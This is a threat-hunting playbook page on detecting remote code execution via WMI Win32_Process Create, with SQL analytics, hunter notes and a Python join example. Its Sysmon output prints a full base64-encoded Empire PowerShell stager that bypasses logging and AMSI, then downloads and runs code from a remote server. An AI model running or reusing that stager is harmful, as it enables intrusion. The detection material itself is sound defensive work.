WMI Win32_Process Class and Create Method for Remote Execution

Metadata

id: WIN-190810201010

author: Roberto Rodriguez @Cyb3rWard0g

creation date: 2019/08/10

platform: Windows

playbook link:

Technical Description

WMI is the Microsoft implementation of Web-Based Enterprise Management (WBEM) and the Common Information Model (CIM). Both standards aim to provide an industry-agnostic means of collecting and transmitting information about any managed component in an enterprise. Examples of managed components in WMI are a running process, a registry key, an installed service, file information, etc. At a high level, Microsoft's implementation of these standards can be summarized as follows.

Managed components: managed components are represented as WMI objects, that is, class instances representing highly structured operating system data. Microsoft provides a wealth of WMI objects that expose information about the operating system, e.g. Win32_Process, Win32_Service, AntiVirusProduct, Win32_StartupCommand, etc.

One well-known lateral movement technique uses the WMI class Win32_Process and its Create method, because Create allows a caller to start a process either locally or on a remote system. When Create is invoked against a remote system, the method does not run inside the caller's process at all: it is serviced on the target by the WMI provider host process, WmiPrvSE.exe.

WmiPrvSE.exe is the process that spawns whatever is passed in the CommandLine parameter of Create, so the process created remotely has WmiPrvSE.exe as its parent. WmiPrvSE.exe is a DCOM server and is itself spawned by the DCOM service host, svchost.exe, running as C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p. From a logon session perspective, WmiPrvSE.exe on the target lives in a different logon session (that of the DCOM service host), but whatever it executes on the caller's behalf runs in the new network (type 3) logon session created when the caller authenticated from the network. This is the property the analytics below rely on: in the resulting 4688 event the creator (SubjectUserName) is the account WmiPrvSE.exe runs as (the machine account HFDC01$ in the sample data), while TargetUserName and TargetLogonId identify the remote user and its network logon session, which can be tied back to a source IP address through the matching 4624 logon event.

Additional Reading

  • https://github.com/hunters-forge/ThreatHunter-Playbook/tree/master/docs/library/logon_session.md

Hypothesis

Adversaries might be leveraging WMI Win32_Process class and method Create to execute code remotely across my environment

Analytics

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/hunters-forge/mordor/master/datasets/small/windows/execution/empire_invoke_wmi.tar.gz"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] Processing Data from Winlogbeat version 6..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Analytic I

FP Rate: Medium

Log Channel: Security

Description: Look for wmiprvse.exe spawning processes that are part of non-system account sessions.

df = spark.sql(
    '''
SELECT `@timestamp`, computer_name, SubjectUserName, TargetUserName, NewProcessName, CommandLine
FROM mordorTable
WHERE channel = "Security"
    AND event_id = 4688
    AND lower(ParentProcessName) LIKE "%wmiprvse.exe"
    AND NOT TargetLogonId = "0x3e7"
    '''
)
df.show(10,False)
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+
|@timestamp            |computer_name   |SubjectUserName|TargetUserName|NewProcessName                                           |CommandLine|
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+
|2019-03-19 15:31:56.94|HFDC01.shire.com|HFDC01$        |Mmidge        |C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|null       |
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+

Analytic II

FP Rate: Medium

Log Channel: Microsoft-Windows-Sysmon/Operational

Description: Look for wmiprvse.exe spawning processes that are part of non-system account sessions.

df = spark.sql(
    '''
SELECT `@timestamp`, computer_name, User, Image, CommandLine
FROM mordorTable
WHERE channel = "Microsoft-Windows-Sysmon/Operational"
    AND event_id = 1
    AND lower(ParentImage) LIKE "%wmiprvse.exe"
    AND NOT LogonId = "0x3e7"
    '''
)
df.show(10,False)
Output (one field per line; the -enc argument is the base64-encoded UTF-16LE Empire stager the dataset was generated with):

@timestamp   : 2019-03-19 15:31:56.948
computer_name: HFDC01.shire.com
User         : SHIRE\Mmidge
Image        : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine  : C:\Windows\System32\WindowsPowershell\v1.0\powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBJAG8ATgBUAEEAYgBsAEUALgBQAFMAVgBFAHIAcwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJAA5AGYAMwA9AFsAUgBlAGYAXQAuAEEAUwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAEkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAA5AEYAMwApAHsAJAAwADUARgA9ACQAOQBGADMALgBHAEUAVABWAGEATABVAGUAKAAkAE4AdQBMAEwAKQA7AEkAZgAoACQAMAA1AEYAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAAwADUARgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAwADUAZgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBMAD0AWwBDAE8ATABsAGUAYwBUAGkATwBuAFMALgBHAGUATgBFAFIASQBDAC4ARABpAEMAdABJAE8ATgBhAFIAWQBbAFMAVABSAGkATgBnACwAUwB5AFMAdABFAE0ALgBPAGIASgBFAEMAVABdAF0AOgA6AG4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAAwADUAZgBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABTAEUAewBbAFMAQwByAEkAUAB0AEIAbABPAGMASwBdAC4AIgBHAGUAVABGAEkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAdQBlACgAJABOAFUAbABMACwAKABOAGUAVwAtAE8AQgBqAEUAYwB0ACAAQwBPAEwAbABlAGMAdABpAG8ATgBzAC4ARwBlAE4ARQBSAEkAQwAuAEgAYQBTAGgAUwBFAHQAWwBTAHQAUgBpAE4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBlAE0AYgBMAFkALgBHAEUAVABUAFkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApADsAJABSAEUAZgAuAEcARQBUAEYAaQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAGwAdQBlACgAJABuAFUATABMACwAJAB0AHIAVQBFACkAOwB9ADsAWwBTAHkAcwB0AEUATQAuAE4AZQBUAC4AUwBFAFIAVgBpAGMAZQBQAE8ASQBOAFQATQBBAE4AQQBnAEUAcgBdADoAOgBFAHgAUABlAGMAdAAxADAAMABDAE8ATgBUAEkAbgBVAGUAPQAwADsAJAAxADcANwA9AE4ARQBXAC0ATwBCAEoARQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBMAEkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQAMQA3ADcALgBIAGUAQQBkAEUAcgBzAC4AQQBEAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAxADcANwAuAEgARQBBAEQAZQBSAHMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkADEANwA3AC4AUAByAG8AWABZAD0AWwBTAFkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAGIAUgBFAFEAVQBlAFMAVABdADoAOgBEAEUAZgBhAFUAbABUAFcARQBCAFAAUgBPAHgAeQA7ACQAMQA3ADcALgBQAHIAbwB4AHkALgBDAFIARQBEAEUAbgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAUwB0AGUAbQAuAE4ARQBUAC4AQwByAEUAZABFAG4AVABpAGEATABDAEEAQwBoAEUAXQA6ADoARABlAEYAYQB1AEwAdABOAEUAdAB3AE8AcgBLAEMAcgBFAGQAZQBOAFQASQBhAEwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAxADcANwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABFAE0ALgBUAGUAWABUAC4ARQBOAEMAbwBkAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAfgBrACoAXwBGAFMAagByADgAJQB4AHcAZQBKADYAaAB8AFAASwAuAGYAewBVAE4ATQBIAHUAZABwADUAeQBtACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAkACgAWwBUAGUAWABUAC4ARQBuAGMATwBkAEkAbgBHAF0AOgA6AFUAbgBJAEMAbwBkAGUALgBHAEUAVABTAHQAcgBpAG4ARwAoAFsAQwBPAG4AdgBFAFIAVABdADoAOgBGAHIATwBtAEIAYQBzAEUANgA0AFMAdABSAGkAbgBHACgAJwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQB1AEEARABBAEEATABnAEEAeABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAGcAQQA9ACcAKQApACkAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkADEANwA3AC4ASABlAEEARABlAFIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBIAFkAdgBsAFAASgBNAG0AcwBrAHkATgBGAFQAawA9AGEAcQBHAGIANQA3AHAAaABKAEUAVgBaAFoAVQBmAFcATAB0AFQAVQBkAGkAUgA4AHAAWQBZAD0AIgApADsAJABEAEEAVABBAD0AJAAxADcANwAuAEQATwBXAE4AbABPAEEARABEAEEAVABhACgAJABzAEUAcgArACQAVAApADsAJABpAHYAPQAkAGQAQQBUAEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAQQBUAGEAWwA0AC4ALgAkAGQAYQB0AEEALgBsAEUAbgBnAHQAaABdADsALQBqAG8ASQBuAFsAQwBoAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Analytic III

FP Rate: Low

Log Channel: Security

Description: Look for non-system accounts leveraging WMI over the network to execute code, by tying the wmiprvse.exe child process to the network (type 3) logon session it runs in and the source address of that logon.

df = spark.sql(
    '''
SELECT o.`@timestamp`, o.computer_name, o.SubjectUserName, o.TargetUserName, o.NewProcessName, o.CommandLine, a.IpAddress
FROM mordorTable o
INNER JOIN (
    -- network logons (4624, logon type 3) of non-machine accounts, with the source address
    SELECT computer_name,TargetUserName,TargetLogonId,IpAddress
    FROM mordorTable
    WHERE channel = "Security"
        AND event_id = 4624
        AND LogonType = 3
        AND IpAddress is not null
        AND NOT TargetUserName LIKE "%$"
    ) a
-- logon IDs are only unique per host (and per boot), so join on the host as well as the logon ID
ON o.computer_name = a.computer_name
    AND o.TargetLogonId = a.TargetLogonId
WHERE o.channel = "Security"
    AND o.event_id = 4688
    AND lower(o.ParentProcessName) LIKE "%wmiprvse.exe"
    AND NOT o.TargetLogonId = "0x3e7"
    '''
)
df.show(10,False)
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+-------------+
|@timestamp            |computer_name   |SubjectUserName|TargetUserName|NewProcessName                                           |CommandLine|IpAddress    |
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+-------------+
|2019-03-19 15:31:56.94|HFDC01.shire.com|HFDC01$        |Mmidge        |C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|null       |172.18.39.105|
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+-------------+

Detection Blindspots

Hunter Notes

  • Stack the child processes of wmiprvse.exe in your environment. This is very helpful to reduce the number of false positives and to understand your environment. You can categorize the data returned by business unit.

  • Look for wmiprvse.exe spawning new processes that are part of a network type logon session.

  • Enrich events with Network Logon events (4624 - Logon Type 3). Join on the host name as well as the logon ID: a TargetLogonId is only unique on one host for one boot, so a join on the logon ID alone can pair a process on one host with a logon on another.

  • 0x3e7 is the SYSTEM logon session. LOCAL SERVICE (0x3e5) and NETWORK SERVICE (0x3e4) are also service sessions; exclude them too if wmiprvse.exe children in those sessions add noise.

  • The CommandLine column of the 4688 results is null because Windows only populates Process Command Line in 4688 when the "Include command line in process creation events" audit policy is enabled. Enable it, or rely on Sysmon event 1 (Analytic II), which records the command line regardless; the Sysmon row above shows the full encoded stager the 4688 row hides.

  • The ParentProcessName (Creator Process Name) field used by Analytic I and III only exists in 4688 on Windows 10 / Windows Server 2016 and later; on older systems use Sysmon's ParentImage instead.
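The join of Analytic III and the process stacking from the first hunter note, written as an added example in plain Python so it can be run without Spark. This is not code from the original notebook and the records are not Mordor data: they are constructed to carry the same Winlogbeat Security field names the SparkSQL analytics use, with made-up hosts, users, logon IDs and addresses. The example also excludes the LOCAL SERVICE and NETWORK SERVICE sessions in addition to SYSTEM, and joins on host plus logon ID, both of which go slightly beyond the notebook's own filter.

```python
"""Added example (not from the original playbook): Analytic III and child-process
stacking over constructed Security 4624/4688 records. Field names mirror the
Winlogbeat schema the notebook queries; hosts, users, logon IDs and IPs are made up.
"""
from collections import Counter

# Built-in service logon sessions: SYSTEM (0x3e7), NETWORK SERVICE (0x3e4), LOCAL SERVICE (0x3e5).
# The notebook only excludes 0x3e7; the other two are excluded here as an extension.
SYSTEM_LOGON_IDS = {"0x3e7", "0x3e4", "0x3e5"}

WMIPRVSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"

# Constructed sample events (not real data).
EVENTS = [
    # 4624 type-3 logon for Mmidge from 172.18.39.105, creating session 0x1a2b3c on HFDC01
    {"channel": "Security", "event_id": 4624, "computer_name": "HFDC01.shire.com",
     "TargetUserName": "Mmidge", "TargetLogonId": "0x1a2b3c", "LogonType": 3,
     "IpAddress": "172.18.39.105"},
    # 4688: WmiPrvSE.exe spawns powershell.exe inside that network session (the WMI Create hit)
    {"channel": "Security", "event_id": 4688, "computer_name": "HFDC01.shire.com",
     "SubjectUserName": "HFDC01$", "TargetUserName": "Mmidge", "TargetLogonId": "0x1a2b3c",
     "ParentProcessName": WMIPRVSE,
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": None},
    # 4688: WmiPrvSE.exe child in the SYSTEM session (local management agent) - excluded
    {"channel": "Security", "event_id": 4688, "computer_name": "HFDC01.shire.com",
     "SubjectUserName": "HFDC01$", "TargetUserName": "HFDC01$", "TargetLogonId": "0x3e7",
     "ParentProcessName": WMIPRVSE,
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": None},
    # 4624 on ANOTHER host that happens to reuse logon ID 0x1a2b3c - must not be joined
    {"channel": "Security", "event_id": 4624, "computer_name": "WS01.shire.com",
     "TargetUserName": "pgustavo", "TargetLogonId": "0x1a2b3c", "LogonType": 3,
     "IpAddress": "10.0.0.99"},
    # 4624 interactive (type 2) logon for Mmidge on HFDC01 - not a network session
    {"channel": "Security", "event_id": 4624, "computer_name": "HFDC01.shire.com",
     "TargetUserName": "Mmidge", "TargetLogonId": "0x4d5e6f", "LogonType": 2,
     "IpAddress": "-"},
    # 4688: WmiPrvSE.exe child in that interactive session (local WMI use) - no type-3 logon to join
    {"channel": "Security", "event_id": 4688, "computer_name": "HFDC01.shire.com",
     "SubjectUserName": "HFDC01$", "TargetUserName": "Mmidge", "TargetLogonId": "0x4d5e6f",
     "ParentProcessName": WMIPRVSE,
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": None},
]


def wmiprvse_children(events):
    """Analytic I: 4688 events whose parent is wmiprvse.exe, outside the service sessions."""
    return [e for e in events
            if e["channel"] == "Security" and e["event_id"] == 4688
            and e["ParentProcessName"].lower().endswith("wmiprvse.exe")
            and e["TargetLogonId"].lower() not in SYSTEM_LOGON_IDS]


def network_logons(events):
    """(host, logon id) -> source IP for 4624 type-3 logons of non-machine accounts."""
    return {(e["computer_name"], e["TargetLogonId"].lower()): e["IpAddress"]
            for e in events
            if e["channel"] == "Security" and e["event_id"] == 4624
            and e["LogonType"] == 3 and e.get("IpAddress")
            and not e["TargetUserName"].endswith("$")}


def remote_wmi_execution(events):
    """Analytic III: wmiprvse.exe children joined to the network logon that owns their session.

    The key includes the host name because a logon ID is only unique per host per boot;
    joining on the logon ID alone would pair the HFDC01 process with the WS01 logon."""
    logons = network_logons(events)
    hits = []
    for e in wmiprvse_children(events):
        ip = logons.get((e["computer_name"], e["TargetLogonId"].lower()))
        if ip is not None:
            hits.append({**e, "IpAddress": ip})
    return hits


def stack_children(events):
    """First hunter note: frequency of wmiprvse.exe child images, for baselining."""
    return Counter(e["NewProcessName"].lower() for e in wmiprvse_children(events))


if __name__ == "__main__":
    for hit in remote_wmi_execution(EVENTS):
        print(hit["computer_name"], hit["TargetUserName"], hit["NewProcessName"], hit["IpAddress"])
    print(stack_children(EVENTS).most_common())
```

Of the three wmiprvse.exe children, only the powershell.exe process survives both filters: the cmd.exe child sits in the SYSTEM session and the WMIC.exe child belongs to an interactive session with no type-3 logon to enrich it from. Drop computer_name from the join key and the WS01 logon would wrongly enrich the HFDC01 process with 10.0.0.99.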

Hunt Output

Category: signature

Type: SIGMA

Name: sysmon_wmi_module_load

References

  • https://posts.specterops.io/threat-hunting-with-jupyter-notebooks-part-4-sql-join-via-apache-sparksql-6630928c931e

  • https://posts.specterops.io/real-time-sysmon-processing-via-ksql-and-helk-part-3-basic-use-case-8fbf383cb54f